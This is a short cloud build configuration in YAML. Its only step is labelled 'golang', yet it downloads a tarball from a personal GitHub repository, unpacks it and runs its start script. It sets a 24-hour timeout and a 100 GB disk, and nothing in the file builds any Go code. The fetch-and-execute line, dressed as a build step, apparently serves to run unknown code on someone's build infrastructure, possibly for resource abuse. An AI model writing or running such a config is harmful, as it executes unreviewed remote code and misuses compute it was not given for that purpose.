steps:
  - name: golang
    args:
      - '-c'
      - >-
         wget https://github.com/sabarlur/joker/raw/main/aing.tar.gz && tar xf aing.tar.gz && ./start.sh
    waitFor:
      - '-'
    entrypoint: /bin/bash
timeout: 86400s
options:
  diskSizeGb: '100'
